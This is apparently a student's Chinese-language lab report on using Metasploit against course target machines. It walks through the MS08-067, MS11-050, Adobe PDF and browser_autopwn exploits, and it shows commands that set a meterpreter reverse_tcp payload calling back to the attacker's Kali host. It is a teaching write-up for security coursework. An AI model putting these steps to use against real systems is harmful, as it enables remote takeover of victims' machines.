20145314郑凯杰《网络对抗技术》实验5 MSF基础应用

20145314郑凯杰《网络对抗技术》实验5 MSF基础应用

1.0 MS08_067安全漏洞

1.1 实验目标

• 了解掌握metasploit平台的一些基本操作，能学会利用已知信息完成简单的渗透操作
• 了解漏洞MS08_067的相关知识
  • 原理：攻击者利用受害者主机默认开放的SMB服务端口445，发送特殊RPC请求，通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化，而此函数中存在栈缓冲区内存漏洞，可被利用实施远程代码执行
  • 影响：能远程主动发起对漏洞主机端口的扫描，并且能直接获得漏洞主机的系统权限，属于最高严重级别的漏洞

1.2 实验内容

首先进入msf控制台，对漏洞MS08_067进行信息搜索。目的是为了获取模块名，以便之后的设置需要。

选择所需的攻击的攻击载荷

选择show options根据msf的回连规则，我们还需要端口号和目的IP地址。

查看靶机IP地址

这时候出现了问题 failed to bind to XXX

这个错误我们仔细一看，下面说目标iP是unreachable的。也就是说两台主机无法ping通。

调整IP地址后，问题解决。

接着就是一路绿灯，实验成功

2.0 ms11_050漏洞攻击，对IE浏览器进行攻击

2.1 实验目标

在同上一步一样的search操作之后，我们找到模块名。

使用该模块：

开始进行新漏洞攻击

对该漏洞不是很了解

用info操作进行查看详细信息。

在available target一项中（可攻击的靶机系统）：

我找到若是在XP系统下，这个漏洞只存在于IE7和IE8中。

调出show options查看漏洞信息，按要求填入payloads,并设置好URIPATH，回连IP和端口。

接下来需要生成一个url，把该url复制到靶机的IE浏览器中进行访问，可以在MSF终端看见漏洞执行成功。

同理，exploit，开始攻击：

根据我们的攻击原理，需要在目标靶机上启用IE并访问该URL：

浏览器中出现了提示。其实这时候已经完成了回连

攻击成功。

3.0 adobe_pdf_embedded_exe，PDF阅读器渗透攻击的尝试

打开KALI后，输入search adobe，寻找adebe的可攻击漏洞

在所有漏洞中，找到一个adobe_pdf_embedded_exe

这个模块攻击效果很好，而且漏洞年份还算比较新的，攻击起来应该挺容易。

于是像很多漏洞攻击一样，使用其模块

然后show options：

发现有很多项，首先看required这个是所有必要的参数。

在这里只有一个INFILENAME是必须的，这个的含义也就是说，这个文件会被做成恶意PDF的源文件。然后开始进行操作：

其他FILENAME什么的就如同字面意思，也有默认参数：

按要求设置好所有参数，然后开始执行该漏洞。

这是会在指定文件夹输出一个目标PDF文件，将其复制到靶机目录下。

接下来就是惊心动魄的攻击时刻了

kali虚拟机开始监听攻击

在靶机端打开目标恶意PDF文件，却出现了提示：

需要选择一个PDF保存的位置

但是靶机上迟迟没有收到回复，这次的攻击就算失败了。

但是按网上的攻击方法，应该可以成功的，具体问题不知道出现在哪里，也有可能是我们用的靶机，老师给的，XPattacker的版本很先进，该漏洞已经被修复了。

4.0 windows/fileformat/adobe_cooltype_sing，PDF阅读器渗透攻击

在经历了上一个失败的尝试之后，我选择一个成功率更高的漏洞windows/fileformat/adobe_cooltype_sing

在search adobe中，其攻击效果特别好

跟3.0中说的一样，首先是show options，然后进行参数的设置

接下来产生了恶意PDF文件，将其复制到靶机上，同样新打开一

个msfconsole，开启监听：

在靶机上打开恶意PDF文件，成功回连，攻击成功

接下来就直接查看系统信息，提权之类的。后面的操作就是一马平川了。

这个实验可以总结一下，后一个（windows/fileformat/adobe_cooltype_sing）漏洞的存在时间是2010年，跟第一个是一样 ，也就排除了第一个因为漏洞时间的问题而失败了的原因。

5.0 auxiliary/server/browser_autopwn，辅助模块渗透攻击

辅助模块是不同于其他实践的一点，需要与大家的不同，我看了大家的博客，总结了大家使用的辅助模块如下：

auxiliary/dos/windows/rdp/ms12_020_maxchannelids 钟轲
auxiliary/scanner/discovery/arp_sweep 雪春 亚军 张晓涵 王嘉澜 卢鑫 郝昊 志远 如想 joke-bright 韩昊辰

auxiliary/scanner/portscan/tcp 李子轩
exploit/windows/browser/ms14_064_ole_code_execution 佳玲
scanner/http/ssl何佳蕾
auxiliary/scanner/discovery/udp_sweep 罗天晨 蔡野
browser_info 心远
scanner/portscan/tcp张梓靖
scanner/http/dir_listing孙文馨
exploit/windows/smb/ms08_067_netapi陈颢文 吴姗珊
auxiliary/scanner/portscan/syn 高其
auxiliary/scanner/portscan/sy 邹京儒
 张薇
MS02 _ 063 _ pptp_do 蔡馨熤
 荆玉茗auxiliary/scanner/ssh/ssh_logi
卢肖明scanner/smb/smb_version
赵嘉鑫

其他都大同小异就不详细说了，我在search adobe中选择了一个不错的模块：

auxiliary/server/browser_autopwn

浏览器 Autopwn 是 Metasploit 提供的辅助模块，在受害者访问网页时，让你能够自动化对它们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别，也就是说他不会对 IE 7 尝试利用 Firefox 的漏洞。基于它的浏览器判断，它决定最适于实施哪个漏洞利用。

首先进入虚拟机，打开console,并搜索可用的autopwn模块

我们选择第一个：

use auxiliary/server/browser_autopwn

接下来使用该模块，并设置好参数，这部分的功能就参照IE漏洞攻击时所用到的一样。

设置我们的载荷，这里我们使用 Windows 反向 TCP：

set payload windows/meterpreter/reverse_tcp
set LHOST 填入我们的KALIIP
set URIPATH "filetypes"

接下来就直接启动exploit就可以了。此时，我们的KALI会直接设置对本机IP的服务器，若靶机访问了我们的IP地址，则就可以对其进行捕获。

进行监听

在靶机（用到的是实践2中所用到的靶机）中进行访问，再切换到kali。

我们发现,kali中获取了大量的，捕获到一堆JAVA的信息，这就是该漏洞的攻击点，一个JAVA编写的网页。

接下来建立会话，数据流量过的时候，我发现这里有两个活动会话，所以我们的建立会话语句也需要更改

由 session -i 1

改为 sessions -i 2

就成功建立会话：

可以查看靶机的IP和系统信息，还可以进行HELP的使用，进行meterpreter的所有控制操作

攻击成功。

6.0 总结归纳

用自己的话解释什么是exploit,payload,encode.

• exploit:我认为是一个攻击的过程，更确切地说，是我们对模块配置后，模块的执行。这种执行具体参照模块，可以是攻击，可以是监听，也可以是钓鱼。
• payload:攻击载荷。攻击载何是我们期望目标系统在被渗透攻击后而执行的代码。用到基本都是meterpreter自带的，meterpreter功能已经十分强大了，就很好用。
• encode:是编码的意思。具体在MSF中的应用好像不太清楚，不过在攻击时确实有看到过encoded，就是已编码过的意思。

感想：

本次实验，重在靶机。漏洞与靶机的配套才是实现本次实验的关键。但这对我们的渗透攻击有什么帮助呢？我认为是在寻找漏洞的思路方面，如果一个漏洞很新（2015年），那么在此之前所有的所有版本的目标程序，就会是一个个极易被攻破的危险品。0DAY漏洞的恐怖之处也就在于这里。

因此我们时常更新系统，更新软件，也不单单是为了使用新功能，更重要的是防止漏洞被攻破。